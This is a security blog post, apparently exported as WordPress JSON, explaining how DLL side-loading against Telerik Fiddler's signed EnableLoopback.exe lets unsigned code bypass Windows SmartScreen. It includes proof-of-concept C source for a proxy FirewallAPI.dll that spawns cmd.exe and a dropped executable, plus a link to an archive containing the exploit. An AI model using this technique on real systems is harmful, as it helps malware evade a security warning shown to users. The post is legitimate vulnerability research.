{"id":1664,"date":"2020-12-19T00:08:46","date_gmt":"2020-12-19T07:08:46","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=1664"},"modified":"2020-12-19T00:08:46","modified_gmt":"2020-12-19T07:08:46","slug":"bypassing-windows-smartscreen","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2020\/12\/bypassing-windows-smartscreen\/","title":{"rendered":"Bypassing Windows SmartScreen"},"content":{"rendered":"\n<p>God, its been forever since I made an update. I figured if I was to make an update after more than a year&#8217;s absence, it better damned well be a good fucking update.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"647\" height=\"647\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/wjhgvxuurfs41.png\" alt=\"\" class=\"wp-image-1679\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/wjhgvxuurfs41.png 647w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/wjhgvxuurfs41-300x300.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/wjhgvxuurfs41-150x150.png 150w\" sizes=\"(max-width: 647px) 100vw, 647px\" \/><figcaption>Feels like the last time I updated this blog<\/figcaption><\/figure>\n\n\n\n<p>OK, so Smart Screen is a windows defender utility that comes with Windows 10. It pops up a warning if you attempt to run a binary that is unsigned and \/ or untrusted.  Kind of annoying when you&#8217;re writing malware or exploits when Windows Defender detects your payloads, but that&#8217;s a topic for another post.<\/p>\n\n\n\n<h2>Smart Screen Process<\/h2>\n\n\n\n<p>Microsoft Smart Screen works on executables by checking:<\/p>\n\n\n\n<ul><li>Is there a malware signature in this binary?<\/li><li>Are we signed?<\/li><li>Is the signing authority in our &#8216;good boy&#8217; list?<\/li><\/ul>\n\n\n\n<p>The &#8216;good boy&#8217; list I am referring to is a list of certificates that are trusted by Microsoft no questions asked. Ever wondered why when you attempt to open a microsoft tool downloaded from the internet that Smart Screen doesn&#8217;t say shit? This is because some certs are in the &#8216;good boy&#8217; list.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"852\" height=\"691\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-2.png\" alt=\"\" class=\"wp-image-1667\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-2.png 852w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-2-300x243.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-2-768x623.png 768w\" sizes=\"(max-width: 852px) 100vw, 852px\" \/><figcaption>What makes them so special?<\/figcaption><\/figure>\n\n\n\n<p>Anyways, here we have an unsigned, untrusted exe written by me that does nothing. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"594\" height=\"442\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-1.png\" alt=\"\" class=\"wp-image-1666\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-1.png 594w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-1-300x223.png 300w\" sizes=\"(max-width: 594px) 100vw, 594px\" \/><figcaption>Do nothing useful<\/figcaption><\/figure>\n\n\n\n<p>Here we have it popping Smart Screen, upset that my binary doesn&#8217;t pass its &#8216;background check&#8217;.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"787\" height=\"718\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image.png\" alt=\"\" class=\"wp-image-1665\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image.png 787w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-300x274.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-768x701.png 768w\" sizes=\"(max-width: 787px) 100vw, 787px\" \/><figcaption>Smart Screen doing its job<\/figcaption><\/figure>\n\n\n\n<p>OK, so how the hell do you bypass this? Well you <strong>could<\/strong> sign your exe, but that costs money. Even then if the certificate authority isn&#8217;t in the Microsoft &#8216;good boy&#8217; list, then smart screen will still alert. <\/p>\n\n\n\n<h2>Inherit Trust Issues<\/h2>\n\n\n\n<p>The answer is obvious. We exploit a program in the &#8216;good boy&#8217; list to run our code. &#8220;But Joe&#8221;, you may ask, &#8220;how the fuck are we supposed to run our code when these trusted exes have a signed check that breaks once you modify them?&#8221;. That&#8217;s a damned good question. The answer lies in the fundamental flaw in how Windows does its signing and code running. Signed executables have an inherit trust issue. Programs that aren&#8217;t signed that are run by programs that are signed are given the same trust. Allow me to illustrate.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"733\" height=\"275\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-3.png\" alt=\"\" class=\"wp-image-1668\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-3.png 733w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-3-300x113.png 300w\" sizes=\"(max-width: 733px) 100vw, 733px\" \/><figcaption>This is why we can&#8217;t have nice things<\/figcaption><\/figure>\n\n\n\n<p>So programs spawned from trusted programs are trusted. Does it only apply to process creation? NO! Dynamic link libraries work in the same manner! <\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-4.png\" alt=\"\" class=\"wp-image-1669\" width=\"580\" height=\"252\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-4.png 632w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-4-300x131.png 300w\" sizes=\"(max-width: 580px) 100vw, 580px\" \/><\/figure>\n\n\n\n<p>So to bypass Smart Screen, we need to exploit the trust issue of either a bad CreateProcess, ShellExec, WinExec, etc call where we can specify our own executable name \/ path. This is hard to do, but not impossible, however I rarely encounter untrusted execution. Anything easier? What about DLL&#8217;s? Those work fantastically and the vulnerabilities for exploiting them are <strong>everywhere<\/strong>. What we are taking advantage of is something called &#8216;Dll Side Loading&#8217;.<\/p>\n\n\n\n<h2>DLL Side Loading<\/h2>\n\n\n\n<p> DLL Side Loading is a what happens when an exe starts searching the current directory for a DLL file, then loading an export from the DLL. By dropping our own DLL, we can exploit this. It&#8217;s not always cut and dry, and there are a number of mitigations that have been put in place to prevent this. <\/p>\n\n\n\n<p>Dll files are loaded in a particular order. <\/p>\n\n\n\n<ol><li>Am I a known DLL? If so, then load from system folders.<\/li><li>Am I defined a dependency in the exe manifest file? If so, load from there.<\/li><li>Am I in the folder where I was launched?<\/li><li>Am I in the system folders?<\/li><li>Am I in the environment variable &#8216;PATH&#8217;?<\/li><li>No to all? FAIL. <\/li><\/ol>\n\n\n\n<p>So what do I mean when I say known DLL? There exists a registry entry on windows that contains a list of DLL&#8217;s that are considered &#8216;known&#8217; and are loaded from the windows and system32 folders first. Its located under HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"753\" height=\"739\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-5.png\" alt=\"\" class=\"wp-image-1670\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-5.png 753w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-5-300x294.png 300w\" sizes=\"(max-width: 753px) 100vw, 753px\" \/><\/figure>\n\n\n\n<p>This may seem like an end all to our side loading exploitation, but not really. An amateur windows programmer may notice that this list is missing a number of DLL files used all the damned time. Things like vcruntime140.dl, winmm.dll, comctl32.dll, and wintrust.dll are missing. This means any exe that is importing entries from these DLL files (and others) are vulnerable to side loading attacks. <\/p>\n\n\n\n<p>The other entry I brought up was the dependency check under the exe manifest. This check however is poorly documented and I rarely ever see it used anywhere (including on Windows binaries). It&#8217;s not much of a mitigation.<\/p>\n\n\n\n<p>So does DLL side jacking work on .NET binaries as well? Hell yes. Ok, so enough about that, and save that for another blog post. Now lets utilize DLL side loading to bypass smart screen. <\/p>\n\n\n\n<h2>Get On With It<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-6-1024x575.png\" alt=\"\" class=\"wp-image-1671\" width=\"580\" height=\"325\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-6-1024x575.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-6-300x169.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-6-768x432.png 768w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-6.png 1194w\" sizes=\"(max-width: 580px) 100vw, 580px\" \/><\/figure>\n\n\n\n<p>So now what we need is an exe that&#8217;s in the good boy list that&#8217;s vulnerable to DLL Side loading. Bonus points if it requires elevation as this ensures our code is run with admin privileges. For this I am choosing a program that comes with <a rel=\"noreferrer noopener\" href=\"https:\/\/www.telerik.com\/fiddler\" target=\"_blank\">Fiddler<\/a> named EnableLoopback.exe and its a .NET exe too! This is a bit of a &#8216;0day&#8217;, but Telerik doesn&#8217;t have a bug bounty and they didn&#8217;t seem interested when I reached out, so screw em. The exe imports DLL &#8216;FirewallAPI.dll&#8217; not in the &#8216;Known DLL&#8217; registry key. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"372\" height=\"434\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-7.png\" alt=\"\" class=\"wp-image-1672\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-7.png 372w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-7-257x300.png 257w\" sizes=\"(max-width: 372px) 100vw, 372px\" \/><\/figure>\n\n\n\n<p>Specifically from FirewallAPI.dll, the program EnableLoopBack.exe is looking at the imported entries &#8216;NetworkIsoationEnumAppContainers&#8217;, &#8216;NetworkIsolationFreeAppContainers&#8217;, &#8216;NetworkIsolationGetAppContainerConfig&#8217;, and &#8216;NetworkIsolationSetAppContainerConfig&#8217;.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"940\" height=\"328\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-8.png\" alt=\"\" class=\"wp-image-1673\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-8.png 940w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-8-300x105.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-8-768x268.png 768w\" sizes=\"(max-width: 940px) 100vw, 940px\" \/><\/figure>\n\n\n\n<p>So we create a DLL file, name the DLL exports accordingly, and place our malicious code in our C functions. <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#include &lt;windows.h&gt;\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lol)\n{\n    switch (ul_reason_for_call)\n    {\n    case DLL_PROCESS_ATTACH:\n\t\t{\n\t\t\tMessageBoxW(NULL,L\"hey how's it going?\",L\"YO\",MB_OK);\n\t\t\tWinExec(\"mspaint.exe\",1); \/\/ can be whatever\n\t\t\tbreak;\n\t\t}\n\tcase DLL_THREAD_ATTACH:\n\tcase DLL_THREAD_DETACH:\n    case DLL_PROCESS_DETACH:\n        break;\n    }\n    return TRUE;\n}\nextern __declspec(dllexport) unsigned int NetworkIsolationEnumAppContainers(unsigned int Flags,\n unsigned int pdwCntPublicACs, int *ppPublicACs)\n{\n\tWinExec(\"iamcool.exe\",1);\n    return 2;\n}\nextern __declspec(dllexport) void NetworkIsolationFreeAppContainers(int *pACs)\n{\n\tWinExec(\"cmd.exe\",1);\n    return;\n}\nextern __declspec(dllexport) unsigned int NetworkIsolationGetAppContainerConfig(unsigned int pdwCntACs, \n\tint *appContainerSids)\n{\n\tWinExec(\"cmd.exe\",1);\n    return 2;\n}\nextern __declspec(dllexport)  unsigned int NetworkIsolationSetAppContainerConfig(unsigned int pdwCntACs,\n int x)\n{\n\tWinExec(\"cmd.exe\",1);\n    return 2;\n}<\/code><\/pre>\n\n\n\n<p>In my code I am running mspaint on DLL attach and running cmd.exe as well as a program &#8216;iamcool.exe&#8217; from the location the main exe is launched from. The DLL code and iamcool executable will both be run under the context of the trusted Fiddler executable.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"Bypassing Microsoft Windows Defender Smart Screen\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/azVHu4zeOPw?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Easy Peasy.<\/p>\n\n\n\n<p>Attached is my DLL, the fiddler exe, the code, etc. <\/p>\n\n\n\n<div class=\"wp-block-file\"><a href=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/bypass-smartscreen-fiddler.7z\">bypass-smartscreen-fiddler<\/a><a href=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/bypass-smartscreen-fiddler.7z\" class=\"wp-block-file__button\" download>Download<\/a><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"540\" height=\"671\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/1607540615674.jpg\" alt=\"\" class=\"wp-image-1680\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/1607540615674.jpg 540w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/1607540615674-241x300.jpg 241w\" sizes=\"(max-width: 540px) 100vw, 540px\" \/><\/figure>\n\n\n\n<p>It feels good to be back writing again.<\/p>\n\n\n\n<p>Jolly Christmas, Merry Holidays, and Happy Hacking!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>God, its been forever since I made an update. I figured if I was to make an update after more than a year&#8217;s absence, it better damned well be a good fucking update. OK, so Smart Screen is a windows defender utility that comes with Windows 10. It pops up a warning if you attempt [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[22,72,120],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1664"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=1664"}],"version-history":[{"count":4,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1664\/revisions"}],"predecessor-version":[{"id":1681,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1664\/revisions\/1681"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=1664"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=1664"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=1664"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}